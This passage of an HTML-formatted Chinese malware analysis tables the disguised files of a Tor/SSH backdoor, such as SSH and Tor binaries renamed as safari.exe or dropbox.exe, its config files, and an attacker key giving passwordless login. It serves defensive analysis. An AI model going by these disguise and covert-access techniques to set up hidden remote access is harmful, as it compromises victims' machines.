style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="" mpa-font-style="mo2loviwjy2" style="font-size: 14px;">)</span></span></p></td><td data-colwidth="91" width="91" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;"><span leaf="">Opera GX 浏览器</span></span></p></td><td data-colwidth="226" width="201" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;word-break: break-all;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">OpenSSH 的守护进程。读取 </span></span><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">statePointer</span></span><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf=""> 配置，监听本地端口，等待攻击者通过 Tor 隧道连接。</span></span></p></td></tr><tr><td data-colwidth="120" width="120" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><span style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="" mpa-font-style="mo2lo5fgv3y" style="font-size: 14px;" data-mpa-action-id="mo2lo5fu19vw" data-pm-slice="0 0 []">safari.exe</span></span></p></td><td data-colwidth="139" width="139" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;" data-mpa-action-id="mo2lp0hw14q8" data-pm-slice="0 0 []"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span style="font-size: 14px;" mpa-font-style="mo2lp0hkie4"><span leaf="">流量混淆插件 </span></span></span><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span style="font-size: 14px;" mpa-font-style="mo2lp0hkc6x"><span leaf="">(obfs4proxy)</span></span></span></p></td><td data-colwidth="91" width="91" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">Safari 浏览器</span></span></p></td><td data-colwidth="226" width="201" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">Tor 的插件。将 Tor 流量伪装成普通 TCP 流量，防止被防火墙或流量审计设备发现。</span></span></p></td></tr><tr><td data-colwidth="120" width="120" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><span style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="" mpa-font-style="mo2lo8991fiw" style="font-size: 14px;" data-mpa-action-id="mo2lo89n1iz1" data-pm-slice="0 0 []">obsstudio.exe</span></span></p></td><td data-colwidth="139" width="139" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;" data-mpa-action-id="mo2lpbgu9ai" data-pm-slice="0 0 []"><span style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="" mpa-font-style="mo2lpbgi12xh" style="font-size: 14px;">SFTP 服务端</span></span><span mpa-font-style="mo2lpbgin14" style="font-size: 14px;"><span style="line-height: 150%;font-family: 宋体;font-variant: normal;text-transform: none;color: rgb(31, 31, 31);"><span leaf=""> (</span></span><code style="line-height: 150%;font-family: 宋体;font-variant: normal;text-transform: none;color: rgb(68, 71, 70);"><span leaf="">sftp-server</span></code></span><span style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="" mpa-font-style="mo2lpbgis33" style="font-size: 14px;">)</span></span></p></td><td data-colwidth="91" width="91" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;"><span leaf="">OBS 直播软件</span></span></p></td><td data-colwidth="226" width="201" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">配合 SSH 使用，允许攻击者通过加密通道从受害电脑上传或下载文件。</span></span></p></td></tr><tr><td data-colwidth="120" width="120" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;word-break: break-all;"><span style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="" mpa-font-style="mo2loh77221x" style="font-size: 14px;" data-mpa-action-id="mo2loh7k3d3" data-pm-slice="0 0 []">ssh-shellhost.exe</span></span></p></td><td data-colwidth="139" width="139" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><span style="font-size:9.0pt;line-height:150%;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="" mpa-font-style="mo2loq5zrhf" style="font-size: 14px;" data-mpa-action-id="mo2loq6czl9" data-pm-slice="0 0 []">SSH 终端主机</span></span></p></td><td data-colwidth="91" width="91" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">(无明显伪装)</span></span></p></td><td data-colwidth="226" width="201" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">OpenSSH 的辅助组件，用于支持在 Windows 上执行 Shell 命令。</span></span></p></td></tr></tbody></table><p style="text-indent: 0px;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">3）配置文件与密钥 (Configs &amp; Keys)</span></span></p><table style="margin-left:0.0;border:none;mso-cellspacing:1.5pt;mso-border-top-alt:none;mso-border-left-alt:none;mso-border-bottom-alt:none;mso-border-right-alt:none;mso-padding-alt:0pt 0pt 0pt 0pt;width:576px;"><thead><tr><td data-colwidth="241" width="241" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><strong style="font-weight: bold;mso-bidi-font-weight: bold;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="">文件名</span></strong></p></td><td data-colwidth="158" width="158" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><strong style="font-weight: bold;mso-bidi-font-weight: bold;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="">真实身份</span></strong></p></td><td data-colwidth="177" width="153" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><strong style="font-weight: bold;mso-bidi-font-weight: bold;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="">功能说明</span></strong></p></td></tr></thead><tbody><tr><td data-colwidth="241" width="241" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><span style="font-size:10.5pt;line-height:150%;mso-bidi-font-size:10.5pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="">statePointer</span></span><o:page></o:page></p></td><td data-colwidth="158" width="158" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;line-height: 150%;"><span style="mso-style-name: &#39;citation-313&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;font-weight: bold;mso-bidi-font-weight: bold;"><span leaf="">SSH 配置文件</span></span><span style="mso-style-name: &#39;citation-313&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf=""> (</span></span><span style="mso-style-name: &#39;citation-313&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #444746;"><span leaf="">sshd_config</span></span><span style="mso-style-name: &#39;citation-313&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="">)</span></span></p></td><td data-colwidth="177" width="153" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;word-break: break-all;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">指导 operagx.exe 监听本地端口 20321，并指定密钥文件位置。</span></span></p></td></tr><tr><td data-colwidth="241" width="241" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><span style="font-size:10.5pt;line-height:150%;mso-bidi-font-size:10.5pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="">statusMap</span></span></p></td><td data-colwidth="158" width="158" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;line-height: 150%;"><span style="mso-style-name: &#39;citation-312&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;font-weight: bold;mso-bidi-font-weight: bold;"><span leaf="">Tor 配置文件</span></span><span style="mso-style-name: &#39;citation-312&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf=""> (</span></span><span style="mso-style-name: &#39;citation-312&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #444746;"><span leaf="">torrc</span></span><span style="mso-style-name: &#39;citation-312&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="">)</span></span></p></td><td data-colwidth="177" width="153" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;word-break: break-all;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">指导 dropbox.exe 创建隐藏服务，暴露 SSH(22)、RDP(3389)、SMB(445) 等端口。</span></span></p></td></tr><tr><td data-colwidth="241" width="241" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><span style="font-size:10.5pt;line-height:150%;mso-bidi-font-size:10.5pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="">indexWeight</span></span></p></td><td data-colwidth="158" width="158" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;line-height: 150%;"><span style="mso-style-name: &#39;citation-311&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;font-weight: bold;mso-bidi-font-weight: bold;"><span leaf="">攻击者公钥</span></span><span style="mso-style-name: &#39;citation-311&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf=""> (</span></span><span style="mso-style-name: &#39;citation-311&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #444746;"><span leaf="">authorized_keys</span></span><span style="mso-style-name: &#39;citation-311&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="">)</span></span></p></td><td data-colwidth="177" width="153" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;word-break: break-all;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">存储了攻击者的 SSH 公钥。攻击者凭此密钥即可免密码登录受害主机。</span></span></p></td></tr><tr><td data-colwidth="241" width="241" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;line-height: 150%;"><span style="font-size:10.5pt;line-height:150%;mso-bidi-font-size:10.5pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;font-weight:bold;mso-bidi-font-weight:bold;"><span leaf="">localResponseSummary</span></span></p></td><td data-colwidth="158" width="158" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;line-height: 150%;"><span style="mso-style-name: &#39;citation-310&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;font-weight: bold;mso-bidi-font-weight: bold;"><span leaf="">主机私钥</span></span><span style="mso-style-name: &#39;citation-310&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf=""> (</span></span><span style="mso-style-name: &#39;citation-310&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #444746;"><span leaf="">ssh_host_key</span></span><span style="mso-style-name: &#39;citation-310&#39;;font-size: 10.5pt;line-height: 150%;mso-bidi-font-size: 10.5pt;font-family: 宋体;mso-ascii-font-family: 宋体;mso-fareast-font-family: 宋体;mso-bidi-font-family: Arial;font-variant: normal;text-transform: none;color: #1F1F1F;"><span leaf="">)</span></span></p></td><td data-colwidth="177" width="153" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-bottom: 0.0pt;word-break: break-all;"><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;color:#1F1F1F;"><span leaf="">受害机的 SSH 服务端私钥，用于建立加密连接时的身份验证。</span></span></p></td></tr><tr><td data-colwidth="241" width="241" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 6pt 9pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: 